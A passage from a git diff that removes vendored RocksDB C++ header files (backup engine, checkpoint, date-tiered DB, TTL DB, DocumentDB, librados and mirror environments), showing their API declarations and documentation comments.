-  // When Open() is called, it will open at most this many of the latest
-  // non-corrupted backups. If 0, it will open all available backups.
-  // Default: 0
-  int max_valid_backups_to_open;
-
-  void Dump(Logger* logger) const;
-
-  explicit BackupableDBOptions(
-      const std::string& _backup_dir, Env* _backup_env = nullptr,
-      bool _share_table_files = true, Logger* _info_log = nullptr,
-      bool _sync = true, bool _destroy_old_data = false,
-      bool _backup_log_files = true, uint64_t _backup_rate_limit = 0,
-      uint64_t _restore_rate_limit = 0, int _max_background_operations = 1,
-      uint64_t _callback_trigger_interval_size = 4 * 1024 * 1024,
-      int _max_valid_backups_to_open = 0)
-      : backup_dir(_backup_dir),
-        backup_env(_backup_env),
-        share_table_files(_share_table_files),
-        info_log(_info_log),
-        sync(_sync),
-        destroy_old_data(_destroy_old_data),
-        backup_log_files(_backup_log_files),
-        backup_rate_limit(_backup_rate_limit),
-        restore_rate_limit(_restore_rate_limit),
-        share_files_with_checksum(false),
-        max_background_operations(_max_background_operations),
-        callback_trigger_interval_size(_callback_trigger_interval_size),
-        max_valid_backups_to_open(_max_valid_backups_to_open) {
-    assert(share_table_files || !share_files_with_checksum);
-  }
-};
-
-struct RestoreOptions {
-  // If true, restore won't overwrite the existing log files in wal_dir. It will
-  // also move all log files from archive directory to wal_dir. Use this option
-  // in combination with BackupableDBOptions::backup_log_files = false for
-  // persisting in-memory databases.
-  // Default: false
-  bool keep_log_files;
-
-  explicit RestoreOptions(bool _keep_log_files = false)
-      : keep_log_files(_keep_log_files) {}
-};
-
-typedef uint32_t BackupID;
-
-struct BackupInfo {
-  BackupID backup_id;
-  int64_t timestamp;
-  uint64_t size;
-
-  uint32_t number_files;
-  std::string app_metadata;
-
-  BackupInfo() {}
-
-  BackupInfo(BackupID _backup_id, int64_t _timestamp, uint64_t _size,
-             uint32_t _number_files, const std::string& _app_metadata)
-      : backup_id(_backup_id),
-        timestamp(_timestamp),
-        size(_size),
-        number_files(_number_files),
-        app_metadata(_app_metadata) {}
-};
-
-class BackupStatistics {
- public:
-  BackupStatistics() {
-    number_success_backup = 0;
-    number_fail_backup = 0;
-  }
-
-  BackupStatistics(uint32_t _number_success_backup,
-                   uint32_t _number_fail_backup)
-      : number_success_backup(_number_success_backup),
-        number_fail_backup(_number_fail_backup) {}
-
-  ~BackupStatistics() {}
-
-  void IncrementNumberSuccessBackup();
-  void IncrementNumberFailBackup();
-
-  uint32_t GetNumberSuccessBackup() const;
-  uint32_t GetNumberFailBackup() const;
-
-  std::string ToString() const;
-
- private:
-  uint32_t number_success_backup;
-  uint32_t number_fail_backup;
-};
-
-// A backup engine for accessing information about backups and restoring from
-// them.
-class BackupEngineReadOnly {
- public:
-  virtual ~BackupEngineReadOnly() {}
-
-  static Status Open(Env* db_env, const BackupableDBOptions& options,
-                     BackupEngineReadOnly** backup_engine_ptr);
-
-  // Returns info about backups in backup_info
-  // You can GetBackupInfo safely, even with other BackupEngine performing
-  // backups on the same directory
-  virtual void GetBackupInfo(std::vector<BackupInfo>* backup_info) = 0;
-
-  // Returns info about corrupt backups in corrupt_backups
-  virtual void GetCorruptedBackups(
-      std::vector<BackupID>* corrupt_backup_ids) = 0;
-
-  // Restoring DB from backup is NOT safe when there is another BackupEngine
-  // running that might call DeleteBackup() or PurgeOldBackups(). It is caller's
-  // responsibility to synchronize the operation, i.e. don't delete the backup
-  // when you're restoring from it
-  // See also the corresponding doc in BackupEngine
-  virtual Status RestoreDBFromBackup(
-      BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) = 0;
-
-  // See the corresponding doc in BackupEngine
-  virtual Status RestoreDBFromLatestBackup(
-      const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) = 0;
-
-  // checks that each file exists and that the size of the file matches our
-  // expectations. it does not check file checksum.
-  //
-  // If this BackupEngine created the backup, it compares the files' current
-  // sizes against the number of bytes written to them during creation.
-  // Otherwise, it compares the files' current sizes against their sizes when
-  // the BackupEngine was opened.
-  //
-  // Returns Status::OK() if all checks are good
-  virtual Status VerifyBackup(BackupID backup_id) = 0;
-};
-
-// A backup engine for creating new backups.
-class BackupEngine {
- public:
-  virtual ~BackupEngine() {}
-
-  // BackupableDBOptions have to be the same as the ones used in previous
-  // BackupEngines for the same backup directory.
-  static Status Open(Env* db_env,
-                     const BackupableDBOptions& options,
-                     BackupEngine** backup_engine_ptr);
-
-  // same as CreateNewBackup, but stores extra application metadata
-  // Flush will always trigger if 2PC is enabled.
-  virtual Status CreateNewBackupWithMetadata(
-      DB* db, const std::string& app_metadata, bool flush_before_backup = false,
-      std::function<void()> progress_callback = []() {}) = 0;
-
-  // Captures the state of the database in the latest backup
-  // NOT a thread safe call
-  // Flush will always trigger if 2PC is enabled.
-  virtual Status CreateNewBackup(DB* db, bool flush_before_backup = false,
-                                 std::function<void()> progress_callback =
-                                     []() {}) {
-    return CreateNewBackupWithMetadata(db, "", flush_before_backup,
-                                       progress_callback);
-  }
-
-  // deletes old backups, keeping latest num_backups_to_keep alive
-  virtual Status PurgeOldBackups(uint32_t num_backups_to_keep) = 0;
-
-  // deletes a specific backup
-  virtual Status DeleteBackup(BackupID backup_id) = 0;
-
-  // Call this from another thread if you want to stop the backup
-  // that is currently happening. It will return immediatelly, will
-  // not wait for the backup to stop.
-  // The backup will stop ASAP and the call to CreateNewBackup will
-  // return Status::Incomplete(). It will not clean up after itself, but
-  // the state will remain consistent. The state will be cleaned up
-  // next time you create BackupableDB or RestoreBackupableDB.
-  virtual void StopBackup() = 0;
-
-  // Returns info about backups in backup_info
-  virtual void GetBackupInfo(std::vector<BackupInfo>* backup_info) = 0;
-
-  // Returns info about corrupt backups in corrupt_backups
-  virtual void GetCorruptedBackups(
-      std::vector<BackupID>* corrupt_backup_ids) = 0;
-
-  // restore from backup with backup_id
-  // IMPORTANT -- if options_.share_table_files == true,
-  // options_.share_files_with_checksum == false, you restore DB from some
-  // backup that is not the latest, and you start creating new backups from the
-  // new DB, they will probably fail.
-  //
-  // Example: Let's say you have backups 1, 2, 3, 4, 5 and you restore 3.
-  // If you add new data to the DB and try creating a new backup now, the
-  // database will diverge from backups 4 and 5 and the new backup will fail.
-  // If you want to create new backup, you will first have to delete backups 4
-  // and 5.
-  virtual Status RestoreDBFromBackup(
-      BackupID backup_id, const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) = 0;
-
-  // restore from the latest backup
-  virtual Status RestoreDBFromLatestBackup(
-      const std::string& db_dir, const std::string& wal_dir,
-      const RestoreOptions& restore_options = RestoreOptions()) = 0;
-
-  // checks that each file exists and that the size of the file matches our
-  // expectations. it does not check file checksum.
-  // Returns Status::OK() if all checks are good
-  virtual Status VerifyBackup(BackupID backup_id) = 0;
-
-  // Will delete all the files we don't need anymore
-  // It will do the full scan of the files/ directory and delete all the
-  // files that are not referenced.
-  virtual Status GarbageCollect() = 0;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/checkpoint.h b/thirdparty/rocksdb/include/rocksdb/utilities/checkpoint.h
deleted file mode 100644
index aa0a394..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/checkpoint.h
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// A checkpoint is an openable snapshot of a database at a point in time.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class DB;
-
-class Checkpoint {
- public:
-  // Creates a Checkpoint object to be used for creating openable snapshots
-  static Status Create(DB* db, Checkpoint** checkpoint_ptr);
-
-  // Builds an openable snapshot of RocksDB on the same disk, which
-  // accepts an output directory on the same disk, and under the directory
-  // (1) hard-linked SST files pointing to existing live SST files
-  // SST files will be copied if output directory is on a different filesystem
-  // (2) a copied manifest files and other files
-  // The directory should not already exist and will be created by this API.
-  // The directory will be an absolute path
-  // log_size_for_flush: if the total log file size is equal or larger than
-  // this value, then a flush is triggered for all the column families. The
-  // default value is 0, which means flush is always triggered. If you move
-  // away from the default, the checkpoint may not contain up-to-date data
-  // if WAL writing is not always enabled.
-  // Flush will always trigger if it is 2PC.
-  virtual Status CreateCheckpoint(const std::string& checkpoint_dir,
-                                  uint64_t log_size_for_flush = 0);
-
-  virtual ~Checkpoint() {}
-};
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/convenience.h b/thirdparty/rocksdb/include/rocksdb/utilities/convenience.h
deleted file mode 100644
index f61afd6..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/convenience.h
+++ /dev/null
@@ -1,10 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-// This file was moved to rocksdb/convenience.h"
-
-#include "rocksdb/convenience.h"
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/date_tiered_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/date_tiered_db.h
deleted file mode 100644
index f259b05..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/date_tiered_db.h
+++ /dev/null
@@ -1,108 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// Date tiered database is a wrapper of DB that implements
-// a simplified DateTieredCompactionStrategy by using multiple column famillies
-// as time windows.
-//
-// DateTieredDB provides an interface similar to DB, but it assumes that user
-// provides keys with last 8 bytes encoded as timestamp in seconds. DateTieredDB
-// is assigned with a TTL to declare when data should be deleted.
-//
-// DateTieredDB hides column families layer from standard RocksDB instance. It
-// uses multiple column families to manage time series data, each containing a
-// specific range of time. Column families are named by its maximum possible
-// timestamp. A column family is created automatically when data newer than
-// latest timestamp of all existing column families. The time range of a column
-// family is configurable by `column_family_interval`. By doing this, we
-// guarantee that compaction will only happen in a column family.
-//
-// DateTieredDB is assigned with a TTL. When all data in a column family are
-// expired (CF_Timestamp <= CUR_Timestamp - TTL), we directly drop the whole
-// column family.
-//
-// TODO(jhli): This is only a simplified version of DTCS. In a complete DTCS,
-// time windows can be merged over time, so that older time windows will have
-// larger time range. Also, compaction are executed only for adjacent SST files
-// to guarantee there is no time overlap between SST files.
-
-class DateTieredDB {
- public:
-  // Open a DateTieredDB whose name is `dbname`.
-  // Similar to DB::Open(), created database object is stored in dbptr.
-  //
-  // Two parameters can be configured: `ttl` to specify the length of time that
-  // keys should exist in the database, and `column_family_interval` to specify
-  // the time range of a column family interval.
-  //
-  // Open a read only database if read only is set as true.
-  // TODO(jhli): Should use an option object that includes ttl and
-  // column_family_interval.
-  static Status Open(const Options& options, const std::string& dbname,
-                     DateTieredDB** dbptr, int64_t ttl,
-                     int64_t column_family_interval, bool read_only = false);
-
-  explicit DateTieredDB() {}
-
-  virtual ~DateTieredDB() {}
-
-  // Wrapper for Put method. Similar to DB::Put(), but column family to be
-  // inserted is decided by the timestamp in keys, i.e. the last 8 bytes of user
-  // key. If key is already obsolete, it will not be inserted.
-  //
-  // When client put a key value pair in DateTieredDB, it assumes last 8 bytes
-  // of keys are encoded as timestamp. Timestamp is a 64-bit signed integer
-  // encoded as the number of seconds since 1970-01-01 00:00:00 (UTC) (Same as
-  // Env::GetCurrentTime()). Timestamp should be encoded in big endian.
-  virtual Status Put(const WriteOptions& options, const Slice& key,
-                     const Slice& val) = 0;
-
-  // Wrapper for Get method. Similar to DB::Get() but column family is decided
-  // by timestamp in keys. If key is already obsolete, it will not be found.
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     std::string* value) = 0;
-
-  // Wrapper for Delete method. Similar to DB::Delete() but column family is
-  // decided by timestamp in keys. If key is already obsolete, return NotFound
-  // status.
-  virtual Status Delete(const WriteOptions& options, const Slice& key) = 0;
-
-  // Wrapper for KeyMayExist method. Similar to DB::KeyMayExist() but column
-  // family is decided by timestamp in keys. Return false when key is already
-  // obsolete.
-  virtual bool KeyMayExist(const ReadOptions& options, const Slice& key,
-                           std::string* value, bool* value_found = nullptr) = 0;
-
-  // Wrapper for Merge method. Similar to DB::Merge() but column family is
-  // decided by timestamp in keys.
-  virtual Status Merge(const WriteOptions& options, const Slice& key,
-                       const Slice& value) = 0;
-
-  // Create an iterator that hides low level details. This iterator internally
-  // merge results from all active time series column families. Note that
-  // column families are not deleted until all data are obsolete, so this
-  // iterator can possibly access obsolete key value pairs.
-  virtual Iterator* NewIterator(const ReadOptions& opts) = 0;
-
-  // Explicitly drop column families in which all keys are obsolete. This
-  // process is also inplicitly done in Put() operation.
-  virtual Status DropObsoleteColumnFamilies() = 0;
-
-  static const uint64_t kTSLength = sizeof(int64_t);  // size of timestamp
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/db_ttl.h b/thirdparty/rocksdb/include/rocksdb/utilities/db_ttl.h
deleted file mode 100644
index 7c9c0cc..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/db_ttl.h
+++ /dev/null
@@ -1,68 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// Database with TTL support.
-//
-// USE-CASES:
-// This API should be used to open the db when key-values inserted are
-//  meant to be removed from the db in a non-strict 'ttl' amount of time
-//  Therefore, this guarantees that key-values inserted will remain in the
-//  db for >= ttl amount of time and the db will make efforts to remove the
-//  key-values as soon as possible after ttl seconds of their insertion.
-//
-// BEHAVIOUR:
-// TTL is accepted in seconds
-// (int32_t)Timestamp(creation) is suffixed to values in Put internally
-// Expired TTL values deleted in compaction only:(Timestamp+ttl<time_now)
-// Get/Iterator may return expired entries(compaction not run on them yet)
-// Different TTL may be used during different Opens
-// Example: Open1 at t=0 with ttl=4 and insert k1,k2, close at t=2
-//          Open2 at t=3 with ttl=5. Now k1,k2 should be deleted at t>=5
-// read_only=true opens in the usual read-only mode. Compactions will not be
-//  triggered(neither manual nor automatic), so no expired entries removed
-//
-// CONSTRAINTS:
-// Not specifying/passing or non-positive TTL behaves like TTL = infinity
-//
-// !!!WARNING!!!:
-// Calling DB::Open directly to re-open a db created by this API will get
-//  corrupt values(timestamp suffixed) and no ttl effect will be there
-//  during the second Open, so use this API consistently to open the db
-// Be careful when passing ttl with a small positive value because the
-//  whole database may be deleted in a small amount of time
-
-class DBWithTTL : public StackableDB {
- public:
-  virtual Status CreateColumnFamilyWithTtl(
-      const ColumnFamilyOptions& options, const std::string& column_family_name,
-      ColumnFamilyHandle** handle, int ttl) = 0;
-
-  static Status Open(const Options& options, const std::string& dbname,
-                     DBWithTTL** dbptr, int32_t ttl = 0,
-                     bool read_only = false);
-
-  static Status Open(const DBOptions& db_options, const std::string& dbname,
-                     const std::vector<ColumnFamilyDescriptor>& column_families,
-                     std::vector<ColumnFamilyHandle*>* handles,
-                     DBWithTTL** dbptr, std::vector<int32_t> ttls,
-                     bool read_only = false);
-
- protected:
-  explicit DBWithTTL(DB* db) : StackableDB(db) {}
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/debug.h b/thirdparty/rocksdb/include/rocksdb/utilities/debug.h
deleted file mode 100644
index bc5b9bf..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/debug.h
+++ /dev/null
@@ -1,41 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-// Data associated with a particular version of a key. A database may internally
-// store multiple versions of a same user key due to snapshots, compaction not
-// happening yet, etc.
-struct KeyVersion {
-  KeyVersion() : user_key(""), value(""), sequence(0), type(0) {}
-
-  KeyVersion(const std::string& _user_key, const std::string& _value,
-             SequenceNumber _sequence, int _type)
-      : user_key(_user_key), value(_value), sequence(_sequence), type(_type) {}
-
-  std::string user_key;
-  std::string value;
-  SequenceNumber sequence;
-  // TODO(ajkr): we should provide a helper function that converts the int to a
-  // string describing the type for easier debugging.
-  int type;
-};
-
-// Returns listing of all versions of keys in the provided user key range.
-// The range is inclusive-inclusive, i.e., [`begin_key`, `end_key`].
-// The result is inserted into the provided vector, `key_versions`.
-Status GetAllKeyVersions(DB* db, Slice begin_key, Slice end_key,
-                         std::vector<KeyVersion>* key_versions);
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/document_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/document_db.h
deleted file mode 100644
index 3668a50..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/document_db.h
+++ /dev/null
@@ -1,149 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/utilities/json_document.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// IMPORTANT: DocumentDB is a work in progress. It is unstable and we might
-// change the API without warning. Talk to RocksDB team before using this in
-// production ;)
-
-// DocumentDB is a layer on top of RocksDB that provides a very simple JSON API.
-// When creating a DB, you specify a list of indexes you want to keep on your
-// data. You can insert a JSON document to the DB, which is automatically
-// indexed. Every document added to the DB needs to have "_id" field which is
-// automatically indexed and is an unique primary key. All other indexes are
-// non-unique.
-
-// NOTE: field names in the JSON are NOT allowed to start with '$' or
-// contain '.'. We don't currently enforce that rule, but will start behaving
-// badly.
-
-// Cursor is what you get as a result of executing query. To get all
-// results from a query, call Next() on a Cursor while  Valid() returns true
-class Cursor {
- public:
-  Cursor() = default;
-  virtual ~Cursor() {}
-
-  virtual bool Valid() const = 0;
-  virtual void Next() = 0;
-  // Lifecycle of the returned JSONDocument is until the next Next() call
-  virtual const JSONDocument& document() const = 0;
-  virtual Status status() const = 0;
-
- private:
-  // No copying allowed
-  Cursor(const Cursor&);
-  void operator=(const Cursor&);
-};
-
-struct DocumentDBOptions {
-  int background_threads = 4;
-  uint64_t memtable_size = 128 * 1024 * 1024;    // 128 MB
-  uint64_t cache_size = 1 * 1024 * 1024 * 1024;  // 1 GB
-};
-
-// TODO(icanadi) Add `JSONDocument* info` parameter to all calls that can be
-// used by the caller to get more information about the call execution (number
-// of dropped records, number of updated records, etc.)
-class DocumentDB : public StackableDB {
- public:
-  struct IndexDescriptor {
-    // Currently, you can only define an index on a single field. To specify an
-    // index on a field X, set index description to JSON "{X: 1}"
-    // Currently the value needs to be 1, which means ascending.
-    // In the future, we plan to also support indexes on multiple keys, where
-    // you could mix ascending sorting (1) with descending sorting indexes (-1)
-    JSONDocument* description;
-    std::string name;
-  };
-
-  // Open DocumentDB with specified indexes. The list of indexes has to be
-  // complete, i.e. include all indexes present in the DB, except the primary
-  // key index.
-  // Otherwise, Open() will return an error
-  static Status Open(const DocumentDBOptions& options, const std::string& name,
-                     const std::vector<IndexDescriptor>& indexes,
-                     DocumentDB** db, bool read_only = false);
-
-  explicit DocumentDB(DB* db) : StackableDB(db) {}
-
-  // Create a new index. It will stop all writes for the duration of the call.
-  // All current documents in the DB are scanned and corresponding index entries
-  // are created
-  virtual Status CreateIndex(const WriteOptions& write_options,
-                             const IndexDescriptor& index) = 0;
-
-  // Drop an index. Client is responsible to make sure that index is not being
-  // used by currently executing queries
-  virtual Status DropIndex(const std::string& name) = 0;
-
-  // Insert a document to the DB. The document needs to have a primary key "_id"
-  // which can either be a string or an integer. Otherwise the write will fail
-  // with InvalidArgument.
-  virtual Status Insert(const WriteOptions& options,
-                        const JSONDocument& document) = 0;
-
-  // Deletes all documents matching a filter atomically
-  virtual Status Remove(const ReadOptions& read_options,
-                        const WriteOptions& write_options,
-                        const JSONDocument& query) = 0;
-
-  // Does this sequence of operations:
-  // 1. Find all documents matching a filter
-  // 2. For all documents, atomically:
-  // 2.1. apply the update operators
-  // 2.2. update the secondary indexes
-  //
-  // Currently only $set update operator is supported.
-  // Syntax is: {$set: {key1: value1, key2: value2, etc...}}
-  // This operator will change a document's key1 field to value1, key2 to
-  // value2, etc. New values will be set even if a document didn't have an entry
-  // for the specified key.
-  //
-  // You can not change a primary key of a document.
-  //
-  // Update example: Update({id: {$gt: 5}, $index: id}, {$set: {enabled: true}})
-  virtual Status Update(const ReadOptions& read_options,
-                        const WriteOptions& write_options,
-                        const JSONDocument& filter,
-                        const JSONDocument& updates) = 0;
-
-  // query has to be an array in which every element is an operator. Currently
-  // only $filter operator is supported. Syntax of $filter operator is:
-  // {$filter: {key1: condition1, key2: condition2, etc.}} where conditions can
-  // be either:
-  // 1) a single value in which case the condition is equality condition, or
-  // 2) a defined operators, like {$gt: 4}, which will match all documents that
-  // have key greater than 4.
-  //
-  // Supported operators are:
-  // 1) $gt -- greater than
-  // 2) $gte -- greater than or equal
-  // 3) $lt -- less than
-  // 4) $lte -- less than or equal
-  // If you want the filter to use an index, you need to specify it like this:
-  // {$filter: {...(conditions)..., $index: index_name}}
-  //
-  // Example query:
-  // * [{$filter: {name: John, age: {$gte: 18}, $index: age}}]
-  // will return all Johns whose age is greater or equal to 18 and it will use
-  // index "age" to satisfy the query.
-  virtual Cursor* Query(const ReadOptions& read_options,
-                        const JSONDocument& query) = 0;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/env_librados.h b/thirdparty/rocksdb/include/rocksdb/utilities/env_librados.h
deleted file mode 100644
index 272365f..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/env_librados.h
+++ /dev/null
@@ -1,176 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_UTILITIES_ENV_LIBRADOS_H
-#define ROCKSDB_UTILITIES_ENV_LIBRADOS_H
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/env_mirror.h"
-
-#include <rados/librados.hpp>
-
-namespace rocksdb {
-class LibradosWritableFile;
-
-class EnvLibrados : public EnvWrapper {
- public:
-  // Create a brand new sequentially-readable file with the specified name.
-  // On success, stores a pointer to the new file in *result and returns OK.
-  // On failure stores nullptr in *result and returns non-OK.  If the file does
-  // not exist, returns a non-OK status.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  Status NewSequentialFile(const std::string& fname,
-                           std::unique_ptr<SequentialFile>* result,
-                           const EnvOptions& options) override;
-
-  // Create a brand new random access read-only file with the
-  // specified name.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.  If the file does not exist, returns a non-OK
-  // status.
-  //
-  // The returned file may be concurrently accessed by multiple threads.
-  Status NewRandomAccessFile(const std::string& fname,
-                             std::unique_ptr<RandomAccessFile>* result,
-                             const EnvOptions& options) override;
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  Status NewWritableFile(const std::string& fname,
-                         std::unique_ptr<WritableFile>* result,
-                         const EnvOptions& options) override;
-
-  // Reuse an existing file by renaming it and opening it as writable.
-  Status ReuseWritableFile(const std::string& fname,
-                           const std::string& old_fname,
-                           std::unique_ptr<WritableFile>* result,
-                           const EnvOptions& options) override;
-
-  // Create an object that represents a directory. Will fail if directory
-  // doesn't exist. If the directory exists, it will open the directory
-  // and create a new Directory object.
-  //
-  // On success, stores a pointer to the new Directory in
-  // *result and returns OK. On failure stores nullptr in *result and
-  // returns non-OK.
-  Status NewDirectory(const std::string& name,
-                      std::unique_ptr<Directory>* result) override;
-
-  // Returns OK if the named file exists.
-  //         NotFound if the named file does not exist,
-  //                  the calling process does not have permission to determine
-  //                  whether this file exists, or if the path is invalid.
-  //         IOError if an IO Error was encountered
-  Status FileExists(const std::string& fname) override;
-
-  // Store in *result the names of the children of the specified directory.
-  // The names are relative to "dir".
-  // Original contents of *results are dropped.
-  Status GetChildren(const std::string& dir, std::vector<std::string>* result);
-
-  // Delete the named file.
-  Status DeleteFile(const std::string& fname) override;
-
-  // Create the specified directory. Returns error if directory exists.
-  Status CreateDir(const std::string& dirname) override;
-
-  // Creates directory if missing. Return Ok if it exists, or successful in
-  // Creating.
-  Status CreateDirIfMissing(const std::string& dirname) override;
-
-  // Delete the specified directory.
-  Status DeleteDir(const std::string& dirname) override;
-
-  // Store the size of fname in *file_size.
-  Status GetFileSize(const std::string& fname, uint64_t* file_size) override;
-
-  // Store the last modification time of fname in *file_mtime.
-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override;
-  // Rename file src to target.
-  Status RenameFile(const std::string& src, const std::string& target) override;
-  // Hard Link file src to target.
-  Status LinkFile(const std::string& src, const std::string& target) override;
-
-  // Lock the specified file.  Used to prevent concurrent access to
-  // the same db by multiple processes.  On failure, stores nullptr in
-  // *lock and returns non-OK.
-  //
-  // On success, stores a pointer to the object that represents the
-  // acquired lock in *lock and returns OK.  The caller should call
-  // UnlockFile(*lock) to release the lock.  If the process exits,
-  // the lock will be automatically released.
-  //
-  // If somebody else already holds the lock, finishes immediately
-  // with a failure.  I.e., this call does not wait for existing locks
-  // to go away.
-  //
-  // May create the named file if it does not already exist.
-  Status LockFile(const std::string& fname, FileLock** lock);
-
-  // Release the lock acquired by a previous successful call to LockFile.
-  // REQUIRES: lock was returned by a successful LockFile() call
-  // REQUIRES: lock has not already been unlocked.
-  Status UnlockFile(FileLock* lock);
-
-  // Get full directory name for this db.
-  Status GetAbsolutePath(const std::string& db_path, std::string* output_path);
-
-  // Generate unique id
-  std::string GenerateUniqueId();
-
-  // Get default EnvLibrados
-  static EnvLibrados* Default();
-
-  explicit EnvLibrados(const std::string& db_name,
-                       const std::string& config_path,
-                       const std::string& db_pool);
-
-  explicit EnvLibrados(
-      const std::string& client_name,  // first 3 parameters are
-                                       // for RADOS client init
-      const std::string& cluster_name, const uint64_t flags,
-      const std::string& db_name, const std::string& config_path,
-      const std::string& db_pool, const std::string& wal_dir,
-      const std::string& wal_pool, const uint64_t write_buffer_size);
-  ~EnvLibrados() { _rados.shutdown(); }
-
- private:
-  std::string _client_name;
-  std::string _cluster_name;
-  uint64_t _flags;
-  std::string _db_name;  // get from user, readable string; Also used as db_id
-                         // for db metadata
-  std::string _config_path;
-  librados::Rados _rados;  // RADOS client
-  std::string _db_pool_name;
-  librados::IoCtx _db_pool_ioctx;  // IoCtx for connecting db_pool
-  std::string _wal_dir;            // WAL dir path
-  std::string _wal_pool_name;
-  librados::IoCtx _wal_pool_ioctx;  // IoCtx for connecting wal_pool
-  uint64_t _write_buffer_size;      // WritableFile buffer max size
-
-  /* private function to communicate with rados */
-  std::string _CreateFid();
-  Status _GetFid(const std::string& fname, std::string& fid);
-  Status _GetFid(const std::string& fname, std::string& fid, int fid_len);
-  Status _RenameFid(const std::string& old_fname, const std::string& new_fname);
-  Status _AddFid(const std::string& fname, const std::string& fid);
-  Status _DelFid(const std::string& fname);
-  Status _GetSubFnames(const std::string& dirname,
-                       std::vector<std::string>* result);
-  librados::IoCtx* _GetIoctx(const std::string& prefix);
-  friend class LibradosWritableFile;
-};
-}
-#endif
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/env_mirror.h b/thirdparty/rocksdb/include/rocksdb/utilities/env_mirror.h
deleted file mode 100644
index ffd175a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/env_mirror.h
+++ /dev/null
@@ -1,176 +0,0 @@
-// Copyright (c) 2015, Red Hat, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// MirrorEnv is an Env implementation that mirrors all file-related
-// operations to two backing Env's (provided at construction time).
-// Writes are mirrored.  For read operations, we do the read from both
-// backends and assert that the results match.
-//
-// This is useful when implementing a new Env and ensuring that the
-// semantics and behavior are correct (in that they match that of an
